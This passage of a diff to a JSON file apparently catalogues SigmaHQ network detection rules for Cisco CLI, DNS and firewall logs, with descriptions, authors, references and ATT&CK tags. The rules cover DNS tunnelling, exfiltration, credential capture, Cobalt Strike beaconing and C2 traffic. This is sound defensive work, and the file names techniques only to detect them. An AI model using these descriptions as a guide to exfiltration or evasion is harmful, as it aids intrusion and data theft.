"attack.t1561.002" - ] - }, - "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", - "value": "Cisco File Deletion" - }, - { - "description": "See what commands are being input into the device by other people, full credentials can be in the history", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Not commonly run by administrators, especially if remote logging is configured" - ], - "filename": "cisco_cli_input_capture.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ] - }, - "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", - "value": "Cisco Show 
Commands Input" - }, - { - "description": "Find local accounts being created or modified as well as remote authentication configurations", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "When remote authentication is in place, this should not change often" - ], - "filename": "cisco_cli_local_accounts.yml", - "level": "high", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1098" - ] - }, - "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", - "value": "Cisco Local Accounts" - }, - { - "description": "Modifications to a config that will serve an adversary's impacts or persistence", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "filename": "cisco_cli_modify_config.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.impact", - "attack.t1490", - "attack.t1505", - "attack.t1565.002", - "attack.t1053" - ] - }, - "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", - "value": "Cisco Modify Configuration" - }, - { - "description": "Various protocols maybe used to put data on the device for exfil or infil", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/12", - "falsepositive": [ - "Generally used to copy configs or IOS images" - ], - "filename": "cisco_cli_moving_data.yml", - "level": "low", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" - ], - "tags": [ - 
"attack.collection", - "attack.lateral_movement", - "attack.command_and_control", - "attack.exfiltration", - "attack.t1074", - "attack.t1105", - "attack.t1560.001" - ] - }, - "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", - "value": "Cisco Stage Data" - }, - { - "description": "Show when a monitor or a span/rspan is setup or modified", - "meta": { - "author": "Austin Clark", - "creation_date": "2019/08/11", - "falsepositive": [ - "Admins may setup new or modify old spans, or use a monitor for troubleshooting" - ], - "filename": "cisco_cli_net_sniff.yml", - "level": "medium", - "logsource.category": "accounting", - "logsource.product": "cisco", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ] - }, - "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", - "value": "Cisco Sniffing" - }, - { - "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. 
This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", - "meta": { - "author": "Patrick Bareiss", - "creation_date": "2019/04/07", - "falsepositive": [ - "Valid software, which uses dns for transferring data" - ], - "filename": "net_dns_c2_detection.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://zeltser.com/c2-dns-tunneling/", - "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004", - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", - "value": "Possible DNS Tunneling" - }, - { - "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", - "meta": { - "author": "Florian Roth, Matt Kelly (list of domains)", - "creation_date": "2022/06/07", - "falsepositive": [ - "Unknown" - ], - "filename": "net_dns_external_service_interaction_domains.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/breakersall/status/1533493587828260866", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.reconnaissance", - "attack.t1595.002" - ] - }, - "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", - "value": "DNS Query to External Service Interaction Domains" - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS bytes out rate 
to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_bytes_out.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", - "value": "High DNS Bytes Out" - }, - { - "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_null_records_requests_rate.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", - "value": "High NULL Records Requests Rate" - }, - { - "description": "High DNS requests amount from host per short period of time", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS requests rate to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_requests_rate.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - 
"attack.t1071.004" - ] - }, - "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", - "value": "High DNS Requests Rate" - }, - { - "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" - ], - "filename": "net_dns_high_txt_records_requests_rate.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", - "value": "High TXT Records Requests Rate" - }, - { - "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/05/10", - "falsepositive": [ - "Unknown" - ], - "filename": "net_dns_mal_cobaltstrike.yml", - "level": "critical", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", - "value": "Cobalt Strike DNS Beaconing" - }, - { - "description": "Detects suspicious DNS queries to Monero mining pools", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/10/24", - "falsepositive": [ - "Legitimate crypto coin mining" - ], - 
"filename": "net_dns_pua_cryptocoin_mining_xmr.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496", - "attack.t1567" - ] - }, - "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", - "value": "Monero Crypto Coin Mining Pool Lookup" - }, - { - "description": "Detects suspicious DNS queries using base64 encoding", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/05/10", - "falsepositive": [ - "Unknown" - ], - "filename": "net_dns_susp_b64_queries.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://github.com/krmaxwell/dns-exfiltration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", - "value": "Suspicious DNS Query with B64 Encoded String" - }, - { - "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/06/05", - "falsepositive": [ - "Legitimate use of Telegram bots in the company" - ], - "filename": "net_dns_susp_telegram_api.yml", - "level": "medium", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://core.telegram.org/bots/faq", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - 
"https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102.002" - ] - }, - "uuid": "c64c5175-5189-431b-a55e-6d9882158251", - "value": "Telegram Bot API Request" - }, - { - "description": "Detects strings used in command execution in DNS TXT Answer", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/08/08", - "falsepositive": [ - "Unknown" - ], - "filename": "net_dns_susp_txt_exec_strings.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/stvemillertime/status/1024707932447854592", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", - "value": "DNS TXT Answer with Possible Execution Strings" - }, - { - "description": "Detects wannacry killswitch domain dns queries", - "meta": { - "author": "Mike Wade", - "creation_date": "2020/09/16", - "falsepositive": [ - "Analyst testing" - ], - "filename": "net_dns_wannacry_killswitch_domain.yml", - "level": "high", - "logsource.category": "dns", - "logsource.product": "No established product", - "refs": [ - "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ] - }, - "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", - "value": "Wannacry Killswitch Domain" - }, - { - "description": "Detects communication to C2 servers 
mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "net_firewall_apt_equationgroup_c2.yml", - "level": "high", - "logsource.category": "firewall", - "logsource.product": "No established product", - "refs": [ - "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", - "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.g0020", - "attack.t1041" - ] - }, - "uuid": "881834a4-6659-4773-821e-1c151789d873", - "value": "Equation Group C2 Communication" - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "meta": { - "author": "Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" - ], - "filename": "net_firewall_high_dns_bytes_out.yml", - "level": "medium", - "logsource.category": "firewall", - "logsource.product": "No established product", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "3b6e327d-8649-4102-993f-d25786481589", - "value": "High DNS Bytes Out - Firewall" + "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", + "value": "Network Scans Count By Destination Port" }, { "description": "High DNS requests amount from host per short period of time", 
@@ -10310,55 +83,915 @@ "value": "Network Scans Count By Destination IP" }, { - "description": "Detects many failed connection attempts to different ports or hosts", + "description": "High DNS queries bytes amount from host per short period of time", "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/02/19", + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", "falsepositive": [ - "Inventarization systems", - "Vulnerability scans" + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" ], - "filename": "net_firewall_susp_network_scan_by_port.yml", + "filename": "net_firewall_high_dns_bytes_out.yml", "level": "medium", "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "3b6e327d-8649-4102-993f-d25786481589", + "value": "High DNS Bytes Out - Firewall" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. 
Ensure that an encrypted channels is used for all administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "net_firewall_cleartext_protocols.yml", + "level": "low", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", + "value": "Cleartext Protocol Usage" + }, + { + "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "net_firewall_apt_equationgroup_c2.yml", + "level": "high", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.g0020", + "attack.t1041" + ] + }, + "uuid": "881834a4-6659-4773-821e-1c151789d873", + "value": "Equation Group C2 Communication" + }, + { + "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/06/05", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "filename": 
"net_dns_susp_telegram_api.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://core.telegram.org/bots/faq", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102.002" + ] + }, + "uuid": "c64c5175-5189-431b-a55e-6d9882158251", + "value": "Telegram Bot API Request" + }, + { + "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", + "meta": { + "author": "Florian Roth, Matt Kelly (list of domains)", + "creation_date": "2022/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_external_service_interaction_domains.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://twitter.com/breakersall/status/1533493587828260866", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.reconnaissance", + "attack.t1595.002" + ] + }, + "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", + "value": "DNS Query to External Service Interaction Domains" + }, + { + "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_mal_cobaltstrike.yml", + "level": "critical", + 
"logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", + "value": "Cobalt Strike DNS Beaconing" + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_bytes_out.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", + "value": "High DNS Bytes Out" + }, + { + "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. 
Possible result of iodine tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_null_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", + "value": "High NULL Records Requests Rate" + }, + { + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/07", + "falsepositive": [ + "Valid software, which uses dns for transferring data" + ], + "filename": "net_dns_c2_detection.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004", + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "value": "Possible DNS Tunneling" + }, + { + "description": "Detects strings used in command execution in DNS TXT Answer", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/08/08", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_txt_exec_strings.yml", + 
"level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", + "value": "DNS TXT Answer with Possible Execution Strings" + }, + { + "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_txt_records_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", + "value": "High TXT Records Requests Rate" + }, + { + "description": "Detects suspicious DNS queries using base64 encoding", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/05/10", + "falsepositive": [ + "Unknown" + ], + "filename": "net_dns_susp_b64_queries.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/krmaxwell/dns-exfiltration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" + ], + "tags": [ + 
"attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", + "value": "Suspicious DNS Query with B64 Encoded String" + }, + { + "description": "High DNS requests amount from host per short period of time", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "filename": "net_dns_high_requests_rate.yml", + "level": "medium", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", + "value": "High DNS Requests Rate" + }, + { + "description": "Detects wannacry killswitch domain dns queries", + "meta": { + "author": "Mike Wade", + "creation_date": "2020/09/16", + "falsepositive": [ + "Analyst testing" + ], + "filename": "net_dns_wannacry_killswitch_domain.yml", + "level": "high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", + "value": "Wannacry Killswitch Domain" + }, + { + "description": "Detects suspicious DNS queries to Monero mining pools", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/24", + "falsepositive": [ + "Legitimate crypto coin mining" + ], + "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", + "level": 
"high", + "logsource.category": "dns", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496", + "attack.t1567" + ] + }, + "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", + "value": "Monero Crypto Coin Mining Pool Lookup" + }, + { + "description": "Find information about network devices that is not stored in config files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Commonly used by administrators for troubleshooting" + ], + "filename": "cisco_cli_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" ], "tags": [ "attack.discovery", - "attack.t1046" + "attack.t1083", + "attack.t1201", + "attack.t1057", + "attack.t1018", + "attack.t1082", + "attack.t1016", + "attack.t1049", + "attack.t1033", + "attack.t1124" ] }, - "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", - "value": "Network Scans Count By Destination Port" + "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", + "value": "Cisco Discovery" }, { - "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. 
Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "description": "Modifications to a config that will serve an adversary's impacts or persistence", "meta": { - "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", - "creation_date": "2020/05/03", + "author": "Austin Clark", + "creation_date": "2019/08/12", "falsepositive": [ - "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate administrators may run these commands" ], - "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "filename": "cisco_cli_modify_config.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.impact", + "attack.t1490", + "attack.t1505", + "attack.t1565.002", + "attack.t1053" + ] + }, + "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", + "value": "Cisco Modify Configuration" + }, + { + "description": "See what files are being deleted from flash file systems", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Will be used sometimes by admins to clean up local flash space" + ], + "filename": "cisco_cli_file_deletion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070.004", + "attack.t1561.001", + "attack.t1561.002" + ] + }, + "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", + 
"value": "Cisco File Deletion" + }, + { + "description": "Various protocols maybe used to put data on the device for exfil or infil", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Generally used to copy configs or IOS images" + ], + "filename": "cisco_cli_moving_data.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" + ], + "tags": [ + "attack.collection", + "attack.lateral_movement", + "attack.command_and_control", + "attack.exfiltration", + "attack.t1074", + "attack.t1105", + "attack.t1560.001" + ] + }, + "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", + "value": "Cisco Stage Data" + }, + { + "description": "See what commands are being input into the device by other people, full credentials can be in the history", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Not commonly run by administrators, especially if remote logging is configured" + ], + "filename": "cisco_cli_input_capture.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", + "value": "Cisco Show Commands Input" + }, + { + "description": "Collect pertinent data from the configuration files", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Commonly run by administrators" + ], + "filename": "cisco_cli_collect_data.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + 
